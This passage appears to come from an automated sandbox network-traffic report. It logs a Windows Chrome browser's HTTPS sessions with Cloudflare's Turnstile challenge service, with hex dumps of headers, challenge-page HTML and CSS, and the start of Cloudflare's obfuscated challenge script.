                                                                                                                  2024-10-22 14:09:27 UTC3288OUTData Raw: 76 5f 38 64 36 61 31 30 39 34 37 38 36 39 36 62 39 61 3d 76 4f 4a 57 59 57 4e 57 48 57 37 57 59 25 32 62 63 55 2b 63 30 57 2b 46 48 6a 59 51 2b 4b 32 2b 38 38 63 58 65 63 48 6b 57 63 62 63 35 57 76 6a 24 38 63 79 57 67 30 4a 57 48 6e 47 4a 63 6a 57 4a 4f 2b 65 6d 24 4a 57 63 6e 74 63 67 4a 24 47 63 71 56 63 35 48 65 54 4a 32 63 44 57 24 72 36 63 44 65 6b 24 4b 63 4b 46 63 77 59 4e 42 54 4b 31 63 6d 66 68 76 41 63 71 31 56 24 6d 63 54 70 41 63 70 75 39 6b 41 63 53 57 67 50 68 5a 33 57 59 32 4e 63 63 51 56 4a 39 63 58 44 62 6a 63 31 72 6e 44 55 39 47 41 2b 6b 24 68 63 24 4e 6a 38 51 64 72 42 66 51 63 76 62 50 63 36 35 24 69 63 2b 33 34 6e 59 58 67 56 65 50 64 76 63 24 53 37 79 44 67 4c 46 6c 68 42 30 72 63 37 6b 57 65 76 57 63 39 54 73 35 4d 76 4b 41 65 50
                                                                                                                  Data Ascii: v_8d6a109478696b9a=vOJWYWNWHW7WY%2bcU+c0W+FHjYQ+K2+88cXecHkWcbc5Wvj$8cyWg0JWHnGJcjWJO+em$JWcntcgJ$GcqVc5HeTJ2cDW$r6cDek$KcKFcwYNBTK1cmfhvAcq1V$mcTpAcpu9kAcSWgPhZ3WY2NccQVJ9cXDbjc1rnDU9GA+k$hc$Nj8QdrBfQcvbPc65$ic+34nYXgVePdvc$S7yDgLFlhB0rc7kWevWc9Ts5MvKAeP
                                                                                                                  2024-10-22 14:09:27 UTC434INHTTP/1.1 400 Bad Request
                                                                                                                  Date: Tue, 22 Oct 2024 14:09:27 GMT
                                                                                                                  Content-Type: application/json
                                                                                                                  Content-Length: 14
                                                                                                                  Connection: close
                                                                                                                  cf-chl-out: ZFGrdVVYhHb6LgecwXM5cCEYrmuW4XBuuhnym5dDyLJ0YvOauEVIXn3f5NM4Amn1veHPAyv0tWSTBYb0KDi7gxBV$1TN0mTIZcPMHLwTH
                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a10b0cf05e79e-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-10-22 14:09:27 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 31 30 32 30 30 7d
                                                                                                                  Data Ascii: {"err":110200}


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  72192.168.2.1649832104.18.95.414432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:09:38 UTC814OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv2/-VbzSdWhMfLGjLct/nu8l3/0x4AAAAAAAgk0nqtAQ4g0A4d/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                  Sec-Fetch-Dest: iframe
                                                                                                                  Referer: https://5102487645.my.id/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:09:38 UTC1368INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:09:38 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Content-Length: 26708
                                                                                                                  Connection: close
                                                                                                                  content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self'
                                                                                                                  permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                  accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                  document-policy: js-profiling
                                                                                                                  origin-agent-cluster: ?1
                                                                                                                  cross-origin-opener-policy: same-origin
                                                                                                                  critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                  cross-origin-embedder-policy: require-corp
                                                                                                                  referrer-policy: same-origin
                                                                                                                  2024-10-22 14:09:38 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 36 61 31 30 66 36 33 61 30 34 36 63 33 33 2d 44 46 57 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: Server: cloudflareCF-RAY: 8d6a10f63a046c33-DFWalt-svc: h3=":443"; ma=86400
                                                                                                                  2024-10-22 14:09:38 UTC1288INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                                  Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                                                  2024-10-22 14:09:38 UTC1369INData Raw: 64 65 6e 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69
                                                                                                                  Data Ascii: den;padding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:anti
                                                                                                                  2024-10-22 14:09:38 UTC1369INData Raw: 20 6c 69 6e 65 7b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b
                                                                                                                  Data Ascii: line{stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;
                                                                                                                  2024-10-22 14:09:38 UTC1369INData Raw: 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c
                                                                                                                  Data Ascii: #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark #chal
                                                                                                                  2024-10-22 14:09:38 UTC1369INData Raw: 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c
                                                                                                                  Data Ascii: me-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-helper-l
                                                                                                                  2024-10-22 14:09:38 UTC1369INData Raw: 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 75 6f 34 73 36 66 64 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 7d 74 6f 7b 66 69
                                                                                                                  Data Ascii: -dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.uo4s6fd{0%{fill:#de1303;stroke:#de1303}to{fi
                                                                                                                  2024-10-22 14:09:38 UTC1369INData Raw: 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 6c 6f 67 6f 7b
                                                                                                                  Data Ascii: x-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-compact #logo{
                                                                                                                  2024-10-22 14:09:38 UTC1369INData Raw: 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65 78 2d 73 74 61 72 74 3b 6a 75 73
                                                                                                                  Data Ascii: x}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:flex-start;jus
                                                                                                                  2024-10-22 14:09:38 UTC1369INData Raw: 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 33 70 78 3b 73 74 72 6f 6b 65
                                                                                                                  Data Ascii: 9;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width:3px;stroke


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  73192.168.2.1649833104.18.95.414432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:09:39 UTC745OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8d6a10f63a046c33&lang=auto HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv2/-VbzSdWhMfLGjLct/nu8l3/0x4AAAAAAAgk0nqtAQ4g0A4d/auto/fbE/normal/auto/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:09:39 UTC331INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:09:39 GMT
                                                                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                                                                  Content-Length: 118789
                                                                                                                  Connection: close
                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a10fbaa208d2c-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-10-22 14:09:39 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 62 61 58 49 73 34 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32
                                                                                                                  Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.baXIs4={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2
                                                                                                                  2024-10-22 14:09:39 UTC1369INData Raw: 6f 75 72 25 32 30 49 6e 74 65 72 6e 65 74 25 32 30 63 6f 6e 6e 65 63 74 69 6f 6e 25 32 30 61 6e 64 25 32 30 25 33 43 61 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65 66 72 65 73 68 5f 6c 69 6e 6b 25 32 32 25 33 45 72 65 66 72 65 73 68 25 32 30 74 68 65 25 32 30 70 61 67 65 25 33 43 25 32 46 61 25 33 45 25 32 30 69 66 25 32 30 74 68 65 25 32 30 69 73 73 75 65 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 73 75 63 63 65 73 73 22 3a 22 53 75 63 63 65 73 73 25 32 31 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 76 65 72 69 66 79 69 6e 67 22 3a 22 56 65 72 69 66 79 69 6e 67 2e 2e 2e 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 5f 61 6c 77 61 79 73 5f 70 61 73 73 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 25 32 43 25 32 30 61 6c
                                                                                                                  Data Ascii: our%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","turnstile_success":"Success%21","turnstile_verifying":"Verifying...","testing_only_always_pass":"Testing%20only%2C%20al
                                                                                                                  2024-10-22 14:09:39 UTC1369INData Raw: 31 33 33 34 29 29 2f 36 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 31 33 30 38 29 29 2f 37 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 34 39 38 29 29 2f 38 2a 28 70 61 72 73 65 49 6e 74 28 67 4b 28 35 35 38 29 29 2f 39 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 31 31 33 35 29 29 2f 31 30 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 31 35 38 37 29 29 2f 31 31 2a 28 70 61 72 73 65 49 6e 74 28 67 4b 28 31 37 31 36 29 29 2f 31 32 29 2c 64 3d 3d 3d 66 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 31 39 37 32 39 34 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 4c 28 32 33 35 29 5d 2c 65 4f 3d 66 75 6e 63 74 69
                                                                                                                  Data Ascii: 1334))/6)+-parseInt(gK(1308))/7+parseInt(gK(498))/8*(parseInt(gK(558))/9)+-parseInt(gK(1135))/10+parseInt(gK(1587))/11*(parseInt(gK(1716))/12),d===f)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,197294),eM=this||self,eN=eM[gL(235)],eO=functi
                                                                                                                  2024-10-22 14:09:39 UTC1369INData Raw: 78 5b 68 76 28 31 31 30 31 29 5d 28 67 5b 68 76 28 38 30 38 29 5d 5b 68 76 28 31 35 38 30 29 5d 28 68 29 29 29 2c 78 3d 67 5b 68 76 28 31 33 39 34 29 5d 5b 68 76 28 36 39 32 29 5d 26 26 67 5b 68 76 28 36 37 30 29 5d 3f 67 5b 68 76 28 31 33 39 34 29 5d 5b 68 76 28 36 39 32 29 5d 28 6e 65 77 20 67 5b 28 68 76 28 36 37 30 29 29 5d 28 78 29 29 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 68 78 2c 48 2c 49 2c 4c 2c 4a 29 7b 69 66 28 68 78 3d 68 76 2c 48 3d 7b 7d 2c 48 5b 68 78 28 38 32 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 4b 2c 4c 29 7b 72 65 74 75 72 6e 20 4c 3d 3d 3d 4b 7d 2c 48 5b 68 78 28 31 34 38 34 29 5d 3d 6f 5b 68 78 28 37 38 39 29 5d 2c 49 3d 48 2c 6f 5b 68 78 28 35 32 35 29 5d 21 3d 3d 68 78 28 37 32 39 29 29 7b 66 6f 72 28 47 5b 68 78 28 31 31 36 31 29 5d
                                                                                                                  Data Ascii: x[hv(1101)](g[hv(808)][hv(1580)](h))),x=g[hv(1394)][hv(692)]&&g[hv(670)]?g[hv(1394)][hv(692)](new g[(hv(670))](x)):function(G,hx,H,I,L,J){if(hx=hv,H={},H[hx(826)]=function(K,L){return L===K},H[hx(1484)]=o[hx(789)],I=H,o[hx(525)]!==hx(729)){for(G[hx(1161)]
                                                                                                                  2024-10-22 14:09:39 UTC1369INData Raw: 20 72 65 74 75 72 6e 20 6f 3d 7b 7d 2c 6f 5b 68 79 28 39 31 37 29 5d 3d 69 5b 68 79 28 31 30 35 38 29 5d 2c 73 3d 6f 2c 69 5b 68 79 28 32 36 32 29 5d 28 6d 29 2c 6e 5b 68 79 28 31 31 36 34 29 5d 5b 68 79 28 34 33 38 29 5d 28 69 5b 68 79 28 39 39 39 29 5d 28 6f 2c 69 5b 68 79 28 32 37 32 29 5d 29 29 2c 73 5b 68 79 28 38 34 37 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 7a 2c 50 29 7b 28 68 7a 3d 68 79 2c 46 5b 68 7a 28 31 31 36 34 29 5d 5b 68 7a 28 31 33 36 36 29 5d 28 29 2c 47 5b 68 7a 28 31 31 36 34 29 5d 5b 68 7a 28 38 36 39 29 5d 28 29 2c 48 5b 68 7a 28 31 30 36 35 29 5d 29 26 26 28 50 3d 7b 7d 2c 50 5b 68 7a 28 31 30 33 31 29 5d 3d 73 5b 68 7a 28 39 31 37 29 5d 2c 50 5b 68 7a 28 37 34 38 29 5d 3d 4d 5b 68 7a 28 38 35 37 29 5d 5b 68 7a 28 38 35 38 29 5d 2c
